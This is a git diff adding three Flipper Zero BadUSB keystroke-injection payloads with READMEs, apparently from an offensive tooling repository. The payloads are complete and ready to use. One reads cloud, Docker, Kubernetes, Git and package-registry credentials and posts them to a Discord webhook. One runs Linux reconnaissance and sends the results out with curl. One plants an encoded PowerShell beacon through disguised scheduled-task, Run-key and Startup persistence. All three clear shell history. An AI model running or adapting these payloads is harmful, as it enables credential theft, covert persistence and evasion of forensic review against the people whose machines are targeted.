diff --git a/badusb/NullSec-CloudHarvester/README.md b/badusb/NullSec-CloudHarvester/README.md new file mode 100644 index 0000000..3de0eeb --- /dev/null +++ b/badusb/NullSec-CloudHarvester/README.md @@ -0,0 +1,53 @@ +# NullSec-CloudHarvester + +**Cloud Service Credential & Configuration Extractor** + +## Description + +Extracts saved cloud CLI credentials, API tokens, and configuration files from a Windows target. Targets developers and DevOps engineers who use cloud CLIs. + +## Targeted Services + +| Service | Files Extracted | +|---------|----------------| +| **AWS CLI** | `~/.aws/credentials`, `~/.aws/config` | +| **Azure CLI** | `~/.azure/azureProfile.json`, `clouds.config` | +| **Google Cloud** | `application_default_credentials.json`, `properties`, `credentials.db` path | +| **Docker** | `~/.docker/config.json` (registry auth tokens) | +| **Kubernetes** | `~/.kube/config` (cluster creds + certs) | +| **SSH** | Key file inventory from `~/.ssh/` | +| **Git** | `~/.git-credentials`, `~/.gitconfig` | +| **Terraform** | `~/.terraformrc`, `credentials.tfrc.json` | +| **npm** | `~/.npmrc` (registry tokens) | +| **pip** | `pip.ini` (index credentials) | + +## Setup + +1. Edit `payload.txt` and replace `YOUR_DISCORD_WEBHOOK_URL` with your Discord webhook +2. Copy to Flipper Zero SD: `SD/badusb/NullSec-CloudHarvester/` +3. Run via BadUSB app + +## Exfiltration + +Data is sent to a Discord webhook in chunked messages (1900 char limit per message). Each cloud service section is clearly labeled. + +## Target + +- **OS:** Windows 10/11 +- **Requirements:** PowerShell (default on Windows) +- **Best against:** Developer workstations, CI/CD machines, DevOps laptops + +## OPSEC Notes + +- Runs in hidden PowerShell window +- Clears PSReadLine history on exit +- No files written to disk +- No persistent modifications + +## Legal + +**For authorized penetration testing and security assessments only.** + +## Author + +NullSec ([@bad-antics](https://github.com/bad-antics)) diff --git a/badusb/NullSec-CloudHarvester/payload.txt b/badusb/NullSec-CloudHarvester/payload.txt new file mode 100644 index 0000000..171ad03 --- /dev/null +++ b/badusb/NullSec-CloudHarvester/payload.txt @@ -0,0 +1,121 @@ +REM ################################################ +REM # NullSec-CloudHarvester # +REM # Cloud Service Credential & Config Extractor # +REM # Target: Windows 10/11 # +REM # Author: NullSec (github.com/bad-antics) # +REM ################################################ +REM +REM Extracts saved cloud CLI credentials and configs: +REM - AWS CLI credentials & config +REM - Azure CLI tokens & profiles +REM - Google Cloud SDK configs +REM - Docker configs & registries +REM - Kubernetes configs +REM - Terraform state references +REM - SSH keys inventory +REM - Git credentials +REM +REM Exfiltration: Discord Webhook (configure below) +REM For authorized penetration testing only. + +DELAY 1000 +GUI r +DELAY 500 +STRING powershell -w hidden -ep bypass +ENTER +DELAY 1500 + +REM === CONFIGURE YOUR WEBHOOK HERE === +STRING $wh='YOUR_DISCORD_WEBHOOK_URL'; +ENTER + +STRING $r=@();$u=$env:USERPROFILE;$h=$env:COMPUTERNAME; +ENTER + +REM --- AWS Credentials --- +STRING $awsCred="$u\.aws\credentials";$awsConf="$u\.aws\config"; +ENTER +STRING if(Test-Path $awsCred){$r+="=== AWS CREDENTIALS ===`n"+(gc $awsCred -Raw)} +ENTER +STRING if(Test-Path $awsConf){$r+="=== AWS CONFIG ===`n"+(gc $awsConf -Raw)} +ENTER + +REM --- Azure CLI --- +STRING $azDir="$u\.azure"; +ENTER +STRING if(Test-Path "$azDir\azureProfile.json"){$r+="=== AZURE PROFILE ===`n"+(gc "$azDir\azureProfile.json" -Raw)} +ENTER +STRING if(Test-Path "$azDir\clouds.config"){$r+="=== AZURE CLOUDS ===`n"+(gc "$azDir\clouds.config" -Raw)} +ENTER + +REM --- Google Cloud --- +STRING $gDir="$env:APPDATA\gcloud"; +ENTER +STRING if(Test-Path "$gDir\credentials.db"){$r+="=== GCLOUD CREDS DB EXISTS ===`nPath: $gDir\credentials.db"} +ENTER +STRING if(Test-Path "$gDir\properties"){$r+="=== GCLOUD PROPERTIES ===`n"+(gc "$gDir\properties" -Raw)} +ENTER +STRING if(Test-Path "$gDir\application_default_credentials.json"){$r+="=== GCLOUD ADC ===`n"+(gc "$gDir\application_default_credentials.json" -Raw)} +ENTER + +REM --- Docker --- +STRING $dk="$u\.docker\config.json"; +ENTER +STRING if(Test-Path $dk){$r+="=== DOCKER CONFIG ===`n"+(gc $dk -Raw)} +ENTER + +REM --- Kubernetes --- +STRING $kc="$u\.kube\config"; +ENTER +STRING if(Test-Path $kc){$r+="=== KUBECONFIG ===`n"+(gc $kc -Raw)} +ENTER + +REM --- SSH Keys Inventory --- +STRING $sshDir="$u\.ssh"; +ENTER +STRING if(Test-Path $sshDir){$keys=gci $sshDir -File|%{$_.Name};$r+="=== SSH KEYS ===`n"+($keys-join"`n")} +ENTER + +REM --- Git Credentials --- +STRING $gitCred="$u\.git-credentials"; +ENTER +STRING if(Test-Path $gitCred){$r+="=== GIT CREDENTIALS ===`n"+(gc $gitCred -Raw)} +ENTER +STRING $gitConf="$u\.gitconfig"; +ENTER +STRING if(Test-Path $gitConf){$r+="=== GITCONFIG ===`n"+(gc $gitConf -Raw)} +ENTER + +REM --- Terraform --- +STRING $tfrc="$u\.terraformrc";$tfCred="$env:APPDATA\terraform.d\credentials.tfrc.json"; +ENTER +STRING if(Test-Path $tfrc){$r+="=== TERRAFORMRC ===`n"+(gc $tfrc -Raw)} +ENTER +STRING if(Test-Path $tfCred){$r+="=== TERRAFORM CREDS ===`n"+(gc $tfCred -Raw)} +ENTER + +REM --- npm/pip tokens --- +STRING $npmrc="$u\.npmrc"; +ENTER +STRING if(Test-Path $npmrc){$r+="=== NPMRC ===`n"+(gc $npmrc -Raw)} +ENTER +STRING $pipConf="$env:APPDATA\pip\pip.ini"; +ENTER +STRING if(Test-Path $pipConf){$r+="=== PIP CONFIG ===`n"+(gc $pipConf -Raw)} +ENTER + +REM --- Exfiltrate --- +STRING $out="Cloud Harvest [$h] User: $env:USERNAME`n"+($r-join"`n---`n"); +ENTER +STRING $chunks=[math]::Ceiling($out.Length/1900); +ENTER +STRING for($i=0;$i -lt $chunks;$i++){$chunk=$out.Substring($i*1900,[math]::Min(1900,$out.Length-$i*1900)); +ENTER +STRING $body=@{content="``````$chunk``````"}|ConvertTo-Json; +ENTER +STRING irm $wh -Method Post -Body $body -ContentType 'application/json' -ea SilentlyContinue} +ENTER + +REM --- Cleanup --- +STRING Remove-Item (Get-PSReadLineOption).HistorySavePath -ea SilentlyContinue;exit +ENTER diff --git a/badusb/NullSec-LinuxRecon/README.md b/badusb/NullSec-LinuxRecon/README.md new file mode 100644 index 0000000..b3035b8 --- /dev/null +++ b/badusb/NullSec-LinuxRecon/README.md @@ -0,0 +1,49 @@ +# NullSec-LinuxRecon + +**Comprehensive Linux System Reconnaissance via BadUSB** + +## Description + +Performs thorough system reconnaissance on Linux targets (Ubuntu, Debian, Fedora, Arch, etc.) and exfiltrates findings via webhook. + +## Information Gathered + +| Category | Details | +|----------|---------| +| **System** | Hostname, kernel, distro, uptime, CPU, RAM, disk | +| **User** | Current user, UID, groups, sudo privileges, shell, SSH keys | +| **Users** | All accounts with shell access | +| **Network** | Interfaces, IPs, gateway, DNS, ARP table | +| **Ports** | All listening TCP/UDP ports with process names | +| **Services** | Running systemd services | +| **Cron** | User and system cron jobs | +| **Security** | iptables/ufw rules, SELinux, AppArmor status | +| **SUID** | SUID binaries (privilege escalation candidates) | +| **Containers** | Docker/Podman running containers | +| **Files** | Cloud creds existence check (AWS, Kube, Docker) | + +## Setup + +1. Edit `payload.txt` and replace `YOUR_WEBHOOK_URL` with your Discord/Slack webhook +2. Copy to Flipper Zero SD: `SD/badusb/NullSec-LinuxRecon/` + +## Terminal Launch + +Uses `Ctrl+Alt+T` which works on most Linux desktop environments: +- GNOME, KDE, XFCE, MATE, Cinnamon, Unity + +## OPSEC + +- Runs entirely in background subshell +- Clears bash history after execution +- Unsets variables +- No files written to disk +- Terminal window closes automatically + +## Legal + +**For authorized penetration testing and security assessments only.** + +## Author + +NullSec ([@bad-antics](https://github.com/bad-antics)) diff --git a/badusb/NullSec-LinuxRecon/payload.txt b/badusb/NullSec-LinuxRecon/payload.txt new file mode 100644 index 0000000..64f5e49 --- /dev/null +++ b/badusb/NullSec-LinuxRecon/payload.txt @@ -0,0 +1,166 @@ +REM ################################################ +REM # NullSec-LinuxRecon # +REM # Linux System Reconnaissance via BadUSB # +REM # Target: Linux (Ubuntu/Debian/Fedora/Arch) # +REM # Author: NullSec (github.com/bad-antics) # +REM ################################################ +REM +REM Comprehensive Linux system reconnaissance: +REM - System info (kernel, distro, arch, uptime) +REM - Network config (interfaces, routes, DNS, ARP) +REM - User enumeration (users, groups, sudo, SSH keys) +REM - Running services and open ports +REM - Cron jobs and scheduled tasks +REM - Installed packages (security-relevant) +REM - Docker/container detection +REM - SUID/SGID binary enumeration +REM - Firewall rules +REM +REM Exfiltration: Webhook (configure below) +REM For authorized penetration testing only. + +DELAY 1000 + +REM Open terminal - try multiple methods +CTRL ALT t +DELAY 1500 + +REM === CONFIGURE YOUR WEBHOOK HERE === +STRING export WH='YOUR_WEBHOOK_URL' +ENTER +DELAY 200 + +STRING bash -c '( +ENTER +STRING R="" +ENTER + +REM --- System Info --- +STRING R+="=== SYSTEM INFO ===\n" +ENTER +STRING R+="Hostname: $(hostname)\n" +ENTER +STRING R+="Kernel: $(uname -a)\n" +ENTER +STRING R+="Distro: $(cat /etc/os-release 2>/dev/null | grep PRETTY | cut -d= -f2)\n" +ENTER +STRING R+="Uptime: $(uptime -p 2>/dev/null || uptime)\n" +ENTER +STRING R+="Arch: $(arch)\n" +ENTER +STRING R+="CPU: $(grep -m1 "model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2)\n" +ENTER +STRING R+="RAM: $(free -h 2>/dev/null | awk "/Mem:/{print \$2}")\n" +ENTER +STRING R+="Disk: $(df -h / 2>/dev/null | awk "NR==2{print \$2,\$5}")\n\n" +ENTER + +REM --- Current User --- +STRING R+="=== USER INFO ===\n" +ENTER +STRING R+="User: $(whoami)\n" +ENTER +STRING R+="UID: $(id)\n" +ENTER +STRING R+="Groups: $(groups)\n" +ENTER +STRING R+="Sudo: $(sudo -n -l 2>/dev/null | head -5 || echo "requires password")\n" +ENTER +STRING R+="Home: $(ls -la ~ 2>/dev/null | head -5)\n" +ENTER +STRING R+="Shell: $SHELL\n" +ENTER +STRING R+="SSH Keys: $(ls ~/.ssh/ 2>/dev/null | tr "\n" " " || echo "none")\n\n" +ENTER + +REM --- Other Users --- +STRING R+="=== ALL USERS (shell access) ===\n" +ENTER +STRING R+="$(grep -v nologin /etc/passwd 2>/dev/null | grep -v false | cut -d: -f1,3,6)\n\n" +ENTER + +REM --- Network --- +STRING R+="=== NETWORK ===\n" +ENTER +STRING R+="$(ip -4 addr show 2>/dev/null | grep -E "inet |^[0-9]" || ifconfig 2>/dev/null | grep -E "inet |^[a-z]")\n" +ENTER +STRING R+="Gateway: $(ip route show default 2>/dev/null | awk "{print \$3}")\n" +ENTER +STRING R+="DNS: $(cat /etc/resolv.conf 2>/dev/null | grep nameserver | awk "{print \$2}" | tr "\n" " ")\n" +ENTER +STRING R+="ARP: $(arp -n 2>/dev/null | grep -v Address | head -10)\n\n" +ENTER + +REM --- Listening Ports --- +STRING R+="=== LISTENING PORTS ===\n" +ENTER +STRING R+="$(ss -tulnp 2>/dev/null | head -20 || netstat -tulnp 2>/dev/null | head -20)\n\n" +ENTER + +REM --- Services --- +STRING R+="=== RUNNING SERVICES ===\n" +ENTER +STRING R+="$(systemctl list-units --type=service --state=running 2>/dev/null | head -20 || service --status-all 2>/dev/null | grep + | head -20)\n\n" +ENTER + +REM --- Cron --- +STRING R+="=== CRON JOBS ===\n" +ENTER +STRING R+="$(crontab -l 2>/dev/null || echo "no user crontab")\n" +ENTER +STRING R+="System cron: $(ls /etc/cron.d/ 2>/dev/null | tr "\n" " ")\n\n" +ENTER + +REM --- Security --- +STRING R+="=== SECURITY ===\n" +ENTER +STRING R+="Firewall (iptables): $(iptables -L -n 2>/dev/null | head -10 || echo "no access")\n" +ENTER +STRING R+="Firewall (ufw): $(ufw status 2>/dev/null || echo "not installed")\n" +ENTER +STRING R+="SELinux: $(getenforce 2>/dev/null || echo "not installed")\n" +ENTER +STRING R+="AppArmor: $(aa-status 2>/dev/null | head -3 || echo "not installed")\n\n" +ENTER + +REM --- SUID Binaries --- +STRING R+="=== SUID BINARIES ===\n" +ENTER +STRING R+="$(find /usr/bin /usr/sbin /bin /sbin -perm -4000 2>/dev/null | head -15)\n\n" +ENTER + +REM --- Docker --- +STRING R+="=== CONTAINERS ===\n" +ENTER +STRING R+="Docker: $(docker ps 2>/dev/null | head -10 || echo "not available")\n" +ENTER +STRING R+="Podman: $(podman ps 2>/dev/null | head -5 || echo "not available")\n\n" +ENTER + +REM --- Interesting Files --- +STRING R+="=== INTERESTING FILES ===\n" +ENTER +STRING R+="Bash history: $(wc -l < ~/.bash_history 2>/dev/null || echo 0) lines\n" +ENTER +STRING R+="AWS: $(test -f ~/.aws/credentials && echo "FOUND" || echo "none")\n" +ENTER +STRING R+="Kube: $(test -f ~/.kube/config && echo "FOUND" || echo "none")\n" +ENTER +STRING R+="Docker: $(test -f ~/.docker/config.json && echo "FOUND" || echo "none")\n" +ENTER + +REM --- Exfiltrate --- +STRING printf "%s" "$R" | fold -w 1900 | while IFS= read -r chunk; do +ENTER +STRING curl -s -X POST "$WH" -H "Content-Type: application/json" -d "{\"content\":\"\`\`\`$chunk\`\`\`\"}" 2>/dev/null +ENTER +STRING sleep 1; done +ENTER + +REM --- Cleanup --- +STRING history -c; unset WH R +ENTER +STRING ) &>/dev/null &' +ENTER +STRING exit +ENTER diff --git a/badusb/NullSec-PersistPlant/README.md b/badusb/NullSec-PersistPlant/README.md new file mode 100644 index 0000000..381b4a2 --- /dev/null +++ b/badusb/NullSec-PersistPlant/README.md @@ -0,0 +1,73 @@ +# NullSec-PersistPlant + +**Covert Persistence Mechanism Installer via BadUSB** + +## Description + +Installs multiple persistence mechanisms on a Windows target that beacon home to your C2/listener. Uses three independent methods for redundancy — if one is removed, the others continue operating. + +## Persistence Methods + +| Method | Mechanism | Admin Required | Survives | +|--------|-----------|---------------|----------| +| **Scheduled Task** | `WindowsHealthCheck` task at logon + every 4 hours | No (HKCU) | Reboot, user logoff | +| **Registry Run Key** | `HKCU\...\Run\WindowsHealthSvc` | No | Reboot | +| **Startup VBS** | `HealthCheck.vbs` in Startup folder | No | Reboot | + +## Beacon Payload + +Each persistence method executes a PowerShell beacon that sends: +```json +{ + "user": "targetuser", + "host": "WORKSTATION-01", + "ip": "192.168.1.50", + "os": "Windows 11 Pro", + "time": "2024-01-15 14:30:00" +} +``` + +## Setup + +1. Set up a listener (simple webhook, Discord, or C2 framework) +2. Edit `payload.txt` and replace `YOUR_LISTENER_URL` with your endpoint +3. Copy to Flipper Zero SD: `SD/badusb/NullSec-PersistPlant/` + +## Cleanup / Removal + +To remove all persistence from a target: +```powershell +# Remove scheduled task +Unregister-ScheduledTask -TaskName 'WindowsHealthCheck' -Confirm:$false + +# Remove registry key +Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsHealthSvc' + +# Remove startup VBS +Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\HealthCheck.vbs" +``` + +## OPSEC Notes + +- All three methods use HKCU (no admin/UAC required) +- Task and registry names mimic Windows health services +- VBS wrapper hides the PowerShell window +- PowerShell history is cleared after execution +- Beacon uses encoded command to avoid command-line logging +- Reports back which methods were successfully installed + +## Detection + +Defenders can look for: +- Scheduled tasks with encoded PowerShell arguments +- `HKCU\Run` entries with `powershell -enc` commands +- `.vbs` files in Startup folder +- Network connections to unknown endpoints at regular intervals + +## Legal + +**For authorized penetration testing and red team engagements only. Always obtain written permission before deploying persistence mechanisms.** + +## Author + +NullSec ([@bad-antics](https://github.com/bad-antics)) diff --git a/badusb/NullSec-PersistPlant/payload.txt b/badusb/NullSec-PersistPlant/payload.txt new file mode 100644 index 0000000..a4b8581 --- /dev/null +++ b/badusb/NullSec-PersistPlant/payload.txt @@ -0,0 +1,101 @@ +REM ################################################ +REM # NullSec-PersistPlant # +REM # Covert Persistence Mechanism Installer # +REM # Target: Windows 10/11 # +REM # Author: NullSec (github.com/bad-antics) # +REM ################################################ +REM +REM Installs multiple persistence mechanisms: +REM - Scheduled Task (runs at logon) +REM - Registry Run key +REM - Startup folder shortcut +REM +REM The "implant" is a configurable PowerShell beacon +REM that phones home to your listener on each trigger. +REM +REM For authorized penetration testing only. + +DELAY 1000 +GUI r +DELAY 500 +STRING powershell -w hidden -ep bypass +ENTER +DELAY 1500 + +REM === CONFIGURE YOUR C2/LISTENER HERE === +STRING $C2='YOUR_LISTENER_URL'; +ENTER + +REM === Build the beacon payload === +STRING $beacon = @' +ENTER +STRING $u = $env:USERNAME; $h = $env:COMPUTERNAME +ENTER +STRING $ip = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object {$_.IPAddress -notlike '127.*'} | Select -First 1).IPAddress +ENTER +STRING $os = (Get-CimInstance Win32_OperatingSystem).Caption +ENTER +STRING $body = @{user=$u;host=$h;ip=$ip;os=$os;time=(Get-Date -f 'yyyy-MM-dd HH:mm:ss')} | ConvertTo-Json +ENTER +STRING try { Invoke-RestMethod -Uri $C2 -Method Post -Body $body -ContentType 'application/json' -TimeoutSec 10 } catch {} +ENTER +STRING '@; +ENTER + +REM --- Encode the beacon for persistence --- +STRING $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($beacon)); +ENTER +STRING $cmd = "powershell -w hidden -ep bypass -enc $encoded"; +ENTER + +REM === Method 1: Scheduled Task === +STRING $taskName = 'WindowsHealthCheck'; +ENTER +STRING $action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument "-w hidden -ep bypass -enc $encoded"; +ENTER +STRING $trigger1 = New-ScheduledTaskTrigger -AtLogon; +ENTER +STRING $trigger2 = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Hours 4); +ENTER +STRING $settings = New-ScheduledTaskSettingsSet -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries; +ENTER +STRING Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger1,$trigger2 -Settings $settings -Description 'Windows Health Monitoring Service' -Force 2>$null; +ENTER + +REM === Method 2: Registry Run Key (HKCU - no admin needed) === +STRING $regPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'; +ENTER +STRING Set-ItemProperty -Path $regPath -Name 'WindowsHealthSvc' -Value $cmd -Force 2>$null; +ENTER + +REM === Method 3: Startup Folder === +STRING $startupPath = [Environment]::GetFolderPath('Startup'); +ENTER +STRING $vbsContent = 'Set WshShell = CreateObject("WScript.Shell")' + "`r`n" + 'WshShell.Run "' + $cmd + '", 0, False'; +ENTER +STRING $vbsContent | Out-File "$startupPath\HealthCheck.vbs" -Encoding ASCII -Force 2>$null; +ENTER + +REM --- Confirm installation --- +STRING $methods = @(); +ENTER +STRING if(Get-ScheduledTask -TaskName $taskName -ea SilentlyContinue){$methods += 'ScheduledTask'} +ENTER +STRING if((Get-ItemProperty $regPath -ea SilentlyContinue).WindowsHealthSvc){$methods += 'Registry'} +ENTER +STRING if(Test-Path "$startupPath\HealthCheck.vbs"){$methods += 'StartupVBS'} +ENTER + +REM --- Report back --- +STRING $report = @{host=$env:COMPUTERNAME;user=$env:USERNAME;methods=($methods -join ',');status='planted'} | ConvertTo-Json; +ENTER +STRING irm $C2 -Method Post -Body $report -ContentType 'application/json' -ea SilentlyContinue; +ENTER + +REM --- Cleanup evidence --- +STRING Remove-Item (Get-PSReadLineOption).HistorySavePath -ea SilentlyContinue; +ENTER +STRING [Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory(); +ENTER +STRING exit +ENTER